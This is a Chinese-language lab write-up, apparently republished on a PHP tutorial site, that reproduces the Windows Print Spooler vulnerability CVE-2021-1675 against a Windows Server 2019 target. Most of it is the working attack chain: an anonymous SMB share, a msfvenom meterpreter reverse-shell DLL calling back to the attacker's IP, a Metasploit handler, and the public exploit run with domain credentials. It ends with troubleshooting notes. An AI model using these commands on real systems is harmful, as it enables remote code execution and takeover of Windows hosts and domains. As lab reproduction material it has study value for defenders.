0

0

微软通杀漏洞-CVE-2021-1675复现

雪夜

雪夜

发布时间:2025-09-11 09:17:25

|

517人浏览过

|

来源于php中文网

原创

环境

受害机:window2019(192.168.153.133)

攻击机:kali(192.168.153.134)

利用前提

或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限

一定需要:一个普通的域用户

一定需要:开启Spooler服务

微软通杀漏洞-CVE-2021-1675复现

环境搭建

安装impacket

代码语言:javascript代码运行次数:0运行复制
git clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install

下配置smb服务

vim /etc/samba/smb.conf

代码语言:javascript代码运行次数:0运行复制
[global]map to guest = Bad Userserver role = standalone serverusershare allow guests = yesidmap config * : backend = tdbsmb ports = 445[smb]comment = Sambapath = /tmp/guest ok = yesread only = nobrowsable = yes

sudo service smbd start

生成dll和启动msf

代码语言:javascript代码运行次数:0运行复制
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=4444 -f dll -o /tmp/rever.dllmsfconsoleuse exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcprun
微软通杀漏洞-CVE-2021-1675复现
微软通杀漏洞-CVE-2021-1675复现

下载exp

代码语言:javascript代码运行次数:0运行复制
cd ~/git clone https://github.com/cube0x0/CVE-2021-1675.gitcd CVE-2021-1675

利用漏洞

Memories.ai
Memories.ai

专注于视频解析的AI视觉记忆模型

下载
代码语言:javascript代码运行次数:0运行复制
sudo python3 CVE-2021-1675.py djhons.com/test:Admin@123@192.168.153.133 '\\192.168.153.134\smb\rever.dll'
微软通杀漏洞-CVE-2021-1675复现
微软通杀漏洞-CVE-2021-1675复现
微软通杀漏洞-CVE-2021-1675复现

遇到的坑

第一个坑:

按照exp里面的smb配置文件配置smb后无法匿名登录,需要提供账号和密码,后删除最后一行后可正常匿名访问。在本次实验时通过资源管理器直接访问smb服务器提示组策略出问题但是这个问题可以忽略(我也不知道为什么可以忽略),还有一个奇怪的是在公司同样的配置物理机可以直接访问smb,在家的电脑上却也需要密码而只有win7能正常访问。反正按照我上面讲的就能利用成功。

微软通杀漏洞-CVE-2021-1675复现
微软通杀漏洞-CVE-2021-1675复现

第二个坑:

这是另一个cpp的exp。大概执行过程是受害机会将dll下载到C:\Windows\System32\spool\drivers\x64\3这个目录下然后执行。首先这个cpp需要改4个地方,第一个是112行需要改成C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_[受害机特有的]\Amd64、剩下是将三个含有old的路径改为C:\\Windows\\System32\\spool\\drivers\\x64\\%s。问题来了,第一个问题是不知道112行那个受害机特有的路径是啥,第二个问题明明dll是上传到C:\Windows\System32\spool\drivers\x64\3这个目录但是exp却是执行的C:\Windows\System32\spool\drivers\x64这个目录下的dll而这个目录下根本就没有dll。我也尝试把三个含有old路径修改为C:\\Windows\\System32\\spool\\drivers\\x64\\3\\%s结果还是不行。

第三个坑:

因为这个洞和域没关系,我没有域环境也不想搭就偷懒以win7为靶机,结果一直Connection Failed,这个折腾了我很久。我猜测可能和SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限有关系,因为我这个win7虚拟机没有这个两个权限,以前利用potato提权也失败了。

第四个坑:

在域控上面尝试过利用域管和本地管理员账号来利用这个漏洞,结果都不行只有普通域用户才能利用成功。如果是普通pc就没有账号的限制,但是在普通pc上利用这个漏洞的意义不大。

第五个坑:

利用成功之后sploor这个服务会自动关闭,也就是说这个漏洞只能利用成功一次。

微软通杀漏洞-CVE-2021-1675复现

END

相关专题

更多
js获取数组长度的方法
js获取数组长度的方法

在js中,可以利用array对象的length属性来获取数组长度,该属性可设置或返回数组中元素的数目,只需要使用“array.length”语句即可返回表示数组对象的元素个数的数值,也就是长度值。php中文网还提供JavaScript数组的相关下载、相关课程等内容,供大家免费下载使用。

557

2023.06.20

js刷新当前页面
js刷新当前页面

js刷新当前页面的方法:1、reload方法,该方法强迫浏览器刷新当前页面,语法为“location.reload([bForceGet]) ”;2、replace方法,该方法通过指定URL替换当前缓存在历史里(客户端)的项目,因此当使用replace方法之后,不能通过“前进”和“后退”来访问已经被替换的URL,语法为“location.replace(URL) ”。php中文网为大家带来了js刷新当前页面的相关知识、以及相关文章等内容

395

2023.07.04

js四舍五入
js四舍五入

js四舍五入的方法:1、tofixed方法,可把 Number 四舍五入为指定小数位数的数字;2、round() 方法,可把一个数字舍入为最接近的整数。php中文网为大家带来了js四舍五入的相关知识、以及相关文章等内容

756

2023.07.04

js删除节点的方法
js删除节点的方法

js删除节点的方法有:1、removeChild()方法,用于从父节点中移除指定的子节点,它需要两个参数,第一个参数是要删除的子节点,第二个参数是父节点;2、parentNode.removeChild()方法,可以直接通过父节点调用来删除子节点;3、remove()方法,可以直接删除节点,而无需指定父节点;4、innerHTML属性,用于删除节点的内容。

478

2023.09.01

JavaScript转义字符
JavaScript转义字符

JavaScript中的转义字符是反斜杠和引号,可以在字符串中表示特殊字符或改变字符的含义。本专题为大家提供转义字符相关的文章、下载、课程内容,供大家免费下载体验。

474

2023.09.04

js生成随机数的方法
js生成随机数的方法

js生成随机数的方法有:1、使用random函数生成0-1之间的随机数;2、使用random函数和特定范围来生成随机整数;3、使用random函数和round函数生成0-99之间的随机整数;4、使用random函数和其他函数生成更复杂的随机数;5、使用random函数和其他函数生成范围内的随机小数;6、使用random函数和其他函数生成范围内的随机整数或小数。

1051

2023.09.04

如何启用JavaScript
如何启用JavaScript

JavaScript启用方法有内联脚本、内部脚本、外部脚本和异步加载。详细介绍:1、内联脚本是将JavaScript代码直接嵌入到HTML标签中;2、内部脚本是将JavaScript代码放置在HTML文件的`<script>`标签中;3、外部脚本是将JavaScript代码放置在一个独立的文件;4、外部脚本是将JavaScript代码放置在一个独立的文件。

658

2023.09.12

Js中Symbol类详解
Js中Symbol类详解

javascript中的Symbol数据类型是一种基本数据类型,用于表示独一无二的值。Symbol的特点:1、独一无二,每个Symbol值都是唯一的,不会与其他任何值相等;2、不可变性,Symbol值一旦创建,就不能修改或者重新赋值;3、隐藏性,Symbol值不会被隐式转换为其他类型;4、无法枚举,Symbol值作为对象的属性名时,默认是不可枚举的。

554

2023.09.20

菜鸟裹裹入口以及教程汇总
菜鸟裹裹入口以及教程汇总

本专题整合了菜鸟裹裹入口地址及教程分享,阅读专题下面的文章了解更多详细内容。

0

2026.01.22

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
PostgreSQL 教程
PostgreSQL 教程

共48课时 | 7.6万人学习

Excel 教程
Excel 教程

共162课时 | 12.9万人学习

PHP基础入门课程
PHP基础入门课程

共33课时 | 2万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号